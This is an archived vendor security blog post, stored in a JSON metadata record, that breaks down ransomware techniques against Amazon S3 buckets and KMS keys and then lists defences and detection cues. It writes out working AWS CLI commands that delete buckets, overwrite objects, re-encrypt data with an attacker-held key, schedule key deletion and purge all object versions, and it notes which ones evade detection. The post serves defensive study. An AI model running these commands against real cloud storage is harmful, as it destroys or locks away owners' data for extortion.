{
	"id": "fe3ffee0-2d8e-4086-9a75-e29d8c6d4835",
	"created_at": "2026-04-06T00:09:59.706355Z",
	"updated_at": "2026-04-10T13:12:08.507815Z",
	"deleted_at": null,
	"sha1_hash": "1a076687e5bad52e3847b7050f5eed8dce1c3bc9",
	"title": "Ransomware in the Cloud: Breaking Down the Attack Vectors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 781611,
	"plain_text": "Ransomware in the Cloud: Breaking Down the Attack Vectors\r\nBy Ofir Balassiano, Ofir Shaty\r\nPublished: 2023-11-29 · Archived: 2026-04-05 22:40:59 UTC\r\nThe number of ransomware attacks, especially those involving Amazon S3 buckets, Azure Storage accounts and\r\nother cloud assets, has increased in recent years. Still, most organizations don't act to reduce these attacks or lower\r\ntheir impact. Our research shows, for example, that only 31% of S3 buckets have versioning enabled, an essential\r\nfor data recovery, while just two-thirds of sensitive buckets have logging enabled, a prerequisite for detection.\r\nIn the battle against ransomware, understanding your enemy is half the victory. By diving into the minds of\r\nattackers and evaluating the pros and cons of their techniques, we can anticipate their next moves and fortify our\r\ndefenses.\r\nIn this blog post, we cut through the theory and delve into the practical aspects of ransomware attacks involving\r\ncloud environments. To fortify our defense strategies, we draw from real-world data and simulations to explore\r\nattack vectors and evaluate both their prevalence and their potential impact.\r\nBy examining the modus operandi of ransomware attackers, we aim to understand them, gaining the ability to\r\npredict when a technique might occur, as well as the measures to effectively nip it in the bud.\r\nRansomware Techniques\r\nRansomware attacks in the cloud are carried out via four main techniques — data deletion, override, re-encryption\r\nand disable key, as seen in Figure 1.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 1 of 13\n\nFigure 1: Primary ransomware attack techniques used in the cloud\r\nFirst, let’s dive into each technique and look at the relevant CLI and required permissions, as well as its\r\nadvantages and limitations from the attacker’s perspective.‍\r\n1. Data Deletion\r\n1a. Direct Data Deletion\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 2 of 13\n\nDuring a ransomware attack, the attacker may decide to delete data to gain exclusive control over it. By\r\nunderstanding the mechanisms behind this cyberattack, we can develop more effective counter-strategies.\r\nCLI Command\r\naws s3 rm --recursive s3://your_bucket_name\r\nRequired Permission\r\n‘s3:DeleteObject’\r\nAdvantages\r\nSpeed: Deletion of 1,000 objects in 2 seconds\r\nDoesn’t require permission to list objects in the bucket.\r\nLimitation\r\nIneffective if versioning is enabled, since only the current version is removed.\r\n1b. Indirect Deletion Using Lifecycle Policy\r\nAlternatively, an attacker can manipulate bucket lifecycle rules by setting them to delete objects automatically\r\nafter a certain period and by bypassing the need for direct deletion permissions.\r\nCLI Command\r\naws s3api put-bucket-lifecycle-configuration \\\r\n--bucket my-bucket \\\r\n--lifecycle-configuration '{\r\n\"Rules\": [\r\n{\r\n\"ID\": \"Delete older versions\",\r\n\"Status\": \"Enabled\",\r\n\"Filter\": {\r\n\"Prefix\": \"\"\r\n},\r\n\"NoncurrentVersionExpiration\": {\r\n\"NoncurrentDays\": 1\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 3 of 13\n\n}\r\n}\r\n]\r\n}'\r\nRequired Permission\r\n‘s3:PutLifecycleConfiguration’\r\nAdvantages\r\nStealth: Doesn’t require permissions to access objects directly.\r\nHelps evade detection, since the attacker doesn’t access the objects themselves.\r\nLimitation\r\nTime-consuming: Takes at least one day to initiate deletion.\r\n2. Object Override\r\nIn this technique, attackers create a blank file and systematically replace every object in the bucket to, in effect,\r\nmake the data unusable.\r\nCLI Command\r\n# Create an empty file locally\r\ntouch emptyfile.txt\r\n# Get a list of all objects in the bucket\r\naws s3 ls s3://ransom-test-with-versioning --recursive | awk '{print $4}' \u003e objects.txt\r\n# Read the file line by line\r\nwhile IFS= read -r line\r\ndo\r\n# Copy the empty file to each object in the bucket\r\naws s3 cp emptyfile.txt s3://ransom-test-with-versioning/$line\r\ndone \u003c objects.txt\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 4 of 13\n\n# Remove the local files\r\nrm emptyfile.txt objects.txt\r\nRequired Permissions\r\n‘s3:PutObject’: To overwrite objects within the bucket\r\n‘s3:ListBucket’: To list all objects that need to be overwritten\r\nAdvantage\r\nDoesn’t require ‘s3:DeleteObject’.\r\nLimitation\r\nIneffective against buckets with enabled versioning, since only the most recent version is modified.\r\nRequires additional ‘s3:ListBucket’ permission, which is less common.\r\n3. Object Encryption / Re-Encryption\r\n3a. Encrypt / Re-Encrypt Objects with Local Encryption Key\r\nRe-encryption of all objects in the victim’s bucket also involves multiple techniques, including reading every file\r\nin the bucket and reuploading it — this time with a local encryption key. In this way, the encryption key is the\r\nonly way the victim can decrypt the files.\r\nCLI Command\r\nexport encryption_key=`openssl rand -hex 16`\r\naws s3 cp s3://my-bucket/ s3://my-bucket/ --recursive --sse-c AES256 --sse-c-key $encryption_key\r\nOnce a customer key encrypts the object, the victim will receive the following error when trying to access the\r\nencrypted files.\r\nFigure 2: Error message received when attempting to access the encrypted files\r\nRequired Permissions\r\n‘s3:ListBucket‘: To list and prepare files for re-encryption\r\n‘s3:GetObject‘: To retrieve files\r\n‘s3:PutObject‘: To upload the re-encrypted files back to the bucket\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 5 of 13\n\nAdvantages\r\nSpeed: Like other methods, re-encrypting a large number of objects can be executed quickly.\r\nStorage-free attack: The attacker needs to store only the encryption key, not the files.\r\nLimitation\r\nIneffective if versioning is enabled, since only the latest version of file is affected by the new encryption.\r\n3b. Encrypt / Re-Encrypt Objects with Remote KMS\r\nAnother option is to re-encrypt all the files with a KMS stored in a remote account, which, in this case, is in the\r\nattacker's remote account.\r\nCLI Command\r\naws s3 cp s3://my-bucket/ s3://my-bucket/ --recursive --sse aws:kms --sse-kms-key-id \u003cnew-key-id\u003e\r\nRequired Permissions\r\n‘s3:ListBucket‘: To list and prepare files for re-encryption\r\n‘s3:GetObject‘: To retrieve the files\r\n‘s3:PutObject‘: To upload the re-encrypted files back to the bucket\r\n‘kms:GenerateDataKey’\r\nAdvantages\r\nSpeed: Deletion of 1,000 objects in 2 seconds\r\nStorage-free attack: The attacker needs to store only the encryption key, not the files.\r\nLimitation\r\nIneffective if versioning is enabled, since only the latest version of files is affected by the new encryption.\r\n4. Disable Key\r\n4a. Schedule Key for Deletion\r\nData encrypted with KMS can be decrypted only with that KMS. Without the key, the data is inaccessible.\r\nAttackers can choose to schedule key deletion for the KMS to make the data inaccessible. It isn’t possible to\r\ndelete the key immediately, but it must be scheduled at least seven days in advance.\r\nIn a prod environment with dozens of keys, it’s possible for such a case to go undetected for 7 days, which will\r\nlead to key deletion and data loss.\r\nCLI Command\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 6 of 13\n\naws kms schedule-key-deletion --key-id \u003cnew-key-id\u003e\r\nRequired Permission\r\n‘kms:ScheduleKeyDeletion’\r\nAdvantages\r\nEffective for noncurrent versions if versioning is enabled\r\nStorage-free attack: The attacker needs to store only the encryption key, not the files.\r\nStealth: Doesn’t require permissions to access objects directly.\r\nHelps evade detection, since the attacker doesn’t access the objects themselves.\r\nLimitation\r\nTime-consuming: Takes 7 days to complete.\r\n4b. Delete Key Material\r\nA more sophisticated ransomware tactic involves disabling the key material in S3 buckets encrypted with external\r\nkeys. Unlike AWS-managed keys that have a mandatory delay before deletion, external key material can be\r\ndeleted immediately, leaving the encrypted data inaccessible.\r\nThe attacker’s strategy is to remove access to the encryption key rather than manipulate the data directly.\r\nCLI Command\r\nRequired Permission\r\nkms:DeleteImportedKeyMaterial\r\nAdvantages\r\nData encrypted becomes inaccessible almost instantly as a result of this rapid process\r\nWhen deleting key material from versioned buckets, all files encrypted with it are affected\r\nStealth: Doesn’t require permissions to access objects directly.\r\nHelps evade detection, since the attacker doesn’t access the objects themselves.\r\nLimitation\r\nDependent on obtaining specific permissions (kms:DeleteImportedKeyMaterial), which isn’t common for\r\nthe attacker\r\nComplementary Ransomware Steps: Deletion of All Noncurrent Versions\r\nIf versioning is enabled on the asset, the attacker needs to make all noncurrent versions unavailable for the victim\r\nto complete the attack on the victim’s bucket. The techniques outlined above don't handle the remaining versions.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 7 of 13\n\nCLI Command (to delete remaining backups)\r\naws s3api list-object-versions \\\r\n--bucket my-bucket \\\r\n--output json | jq -r '.Versions[] | .Key + \" \" + .VersionId' | while read key versionId\r\ndo\r\naws s3api delete-object \\\r\n--bucket my-bucket \\\r\n--key \"$key\" \\\r\n--version-id \"$versionId\"\r\ndone\r\nRequired Permissions\r\n‘s3:DeleteObjectVersion’: To delete noncurrent version of an object\r\n‘s3:ListBucketVersions’: To list all noncurrent versions of an object\r\nAdvantage\r\nNone\r\nLimitation\r\nTime to complete depends on the number of noncurrent objects.\r\nComparative Analysis of Ransomware Techniques\r\nAfter exploring the individual ransomware attack scenarios, comparing them across similar conditions helps us\r\nunderstand their relative levels of danger and efficacy.\r\nBefore doing that, though, let’s point out two key parameters that help us make a proper comparison.\r\nDimension of Time\r\nThe time dimension is important in ransomware attacks because it defines the window of opportunity to detect and\r\nrespond to the attack. By measuring the speed of the ransomware techniques in handling varied quantities of data,\r\nwe can rank their relative strength.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 8 of 13\n\nFigure 3: Time dimension of ransomware attack helps identify the attack technique.\r\nThe strength of the direct deletion, override, and re-encryption techniques drops as the quantity of data increases.\r\nIn contrast, techniques that are considered less efficient for small quantities of data, such as schedule for deletion\r\nand indirect deletion using life cycle policy, get relatively stronger as the quantity of data increases.\r\nEfficiency of Attack Execution: CLI Vs. Python\r\nTiming is critical in cloud ransomware scenarios. The time required to delete, write or encrypt data can span\r\nhours, even days, in the cloud. This window is more than an operational concern. It’s a critical factor regarding the\r\nefficacy of attacks and the potential defenses against them. That’s why, when conducting our evaluation, we\r\nexamined the execution speed of ransomware techniques via CLI and Python scripts on S3 buckets, with and\r\nwithout versioning.\r\nThe timing for the various actions are illustrated in the following table.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 9 of 13\n\nFigure 4: The execution speed of ransomware techniques via CLI and Python scripts on S3 buckets\r\nOur findings again highlight the need for security teams to reduce the mean time to detect (MTTD) and mean time\r\nto respond (MTTR) for attacks on their cloud infrastructure.\r\nAt-a-Glance Comparison\r\nThe table below summarizes our findings based on a comparison of the speed, impact and reversibility of each\r\nmethod. It not only highlights the most risky techniques, but also underscores the importance of timely detection\r\nand response strategies in mitigating potential damage.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 10 of 13\n\nWhen examining the table, it becomes evident that quick and irreversible techniques pose the greatest risk. Some\r\ntechniques are stealth and affect noncurrent versions, while others aren’t and don’t. Every technique requires\r\nreading the data. As a result, encryption at rest is one of the best protection mechanisms \\against ransomware in\r\nthe cloud.\r\nProtecting Against Ransomware\r\nWhile ransomware can devastate, you can take actions to neutralize the techniques and reduce the attack’s\r\neffectiveness.\r\n1. Enable versioning to ensure that when one object is re-encrypted with a new KMS, the older version\r\nencrypted with the old KMS won’t be lost forever. This will also increase the time it takes to complete the\r\nattack.\r\n2. Enable MFA deletion when enabling versioning on the bucket. When a bucket has MFA delete enabled in\r\nits versioning configuration, the bucket owner is required to include the x-amz-mfa request header in any\r\nrequest to delete a version of an object permanently or modify the bucket’s versioning state.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 11 of 13\n\n3. Use delete protection. As a secondary protection mechanism, we can use the S3 Object Lock on top of S3\r\nversioning to prevent data from being deleted or overwritten.\r\n4. Use KMS with key material managed by AWS rather than that managed externally or located in a key store\r\nlike CloudHSM. KMS managed by AWS can’t be deleted immediately. It requires scheduling 7 days in\r\nadvance, which gives you enough time to respond to an attack.\r\n5. Use KMS with access policy to allow specific principals to read the data. Attackers who can’t read the data\r\ncan’t carry out a ransomware attack. Put appropriate permissions in the policy as a second layer of security\r\nto access the objects in the S3 bucket.\r\n6. Remove powerful permissions on S3 buckets like ‘s3:PutLifecycleConfiguration,’\r\n‘s3:PutEncryptionConfiguration,’ and ‘s3:DeleteObjectVersion’ to reduce the attack surface.\r\n7. Remove powerful permissions on KMS like ‘kms:DeleteImportedKeyMaterial’ and\r\n‘kms:DeleteCustomKeyStore’ to reduce the attack surface.\r\nEnforce separation of duties. Our 2023 State of Data Security Research shows that all principals with admin\r\npermissions also have consumer privileges. Use the divide-and-conquer approach to separate the permissions\r\nrequired to carry out a full attack by one principal.\r\nThe Stats: How Vulnerable Are You?\r\nEncryption\r\n10% of encrypted buckets utilize CMK for enhanced security.\r\n4% of the 10% above are remotely managed.\r\n72% of remote CMK buckets aren’t actively monitored.\r\nData Protection Measures\r\n31% of buckets have versioning enabled, which is essential for data recovery.\r\n67% of sensitive buckets have logging enabled.\r\n1% of the buckets have object lock, which is crucial for preventing data tampering.\r\nThese figures reveal significant gaps in current data security practices, highlighting areas where immediate\r\nimprovements are necessary to bolster defenses against ransomware attacks.\r\nEarly Detection and Response Tactics\r\nKnowing how much time it takes to perform a ransomware attack on your data is the first step to choosing a\r\nprevention and detection strategy. But you’ll also need to enable logging of data events on your S3 buckets.\r\nScenario 1: Versioning and MFA Deletion Are Disabled\r\nIn a bucket whose versioning and MFA deletion aren’t turned on, the first sign of a ransomware attack will be\r\nmultiple attempts to read / write files from the bucket. The detection requires critical mass before it’s deemed as\r\nan attack, and by nature, detection will raise an alert only after the attack has begun and the data has been\r\nexfiltrated or deleted.\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 12 of 13\n\nScenario 2: Versioning and MFA Deletion are Enabled\r\nIf the bucket is protected with versioning and MFA delete, preliminary signs of an attack could include either\r\nremoving the configuration of MFA deletion, versioning or changing bucket encryption configuration. These signs\r\nhelp us become aware of the attack before it impacts the data. And as long as it’s advancing, we’ll receive\r\nadditional signs that something is happening that requires our attention.\r\nAs previously shown, the presence of noncurrent versions in a versioned S3 bucket adds complexity to a\r\nransomware attack. This means that attackers have to navigate through additional steps to compromise the data,\r\nwhich in turn provides you with a longer time frame to detect and counteract the attack before any significant data\r\nloss occurs.\r\nLearn More\r\nFor insights into cloud security and a better understanding of how your data is exposed in the cloud, read our\r\ncomprehensive State of Cloud Data Security 2023 report. This research sheds light on crucial aspects of cloud data\r\nsecurity and provides actionable steps to defend your valuable data effectively.\r\nIf you haven’t tried Prisma Cloud and would like to test drive best-in-class Code to CloudTM security, we’d love\r\nfor you to experience a free 30-day trial.\r\nSource: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nhttps://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/"
	],
	"report_names": [
		"ransomware-data-protection-cloud"
	],
	"threat_actors": [],
	"ts_created_at": 1775434199,
	"ts_updated_at": 1775826728,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1a076687e5bad52e3847b7050f5eed8dce1c3bc9.pdf",
		"text": "https://archive.orkl.eu/1a076687e5bad52e3847b7050f5eed8dce1c3bc9.txt",
		"img": "https://archive.orkl.eu/1a076687e5bad52e3847b7050f5eed8dce1c3bc9.jpg"
	}
}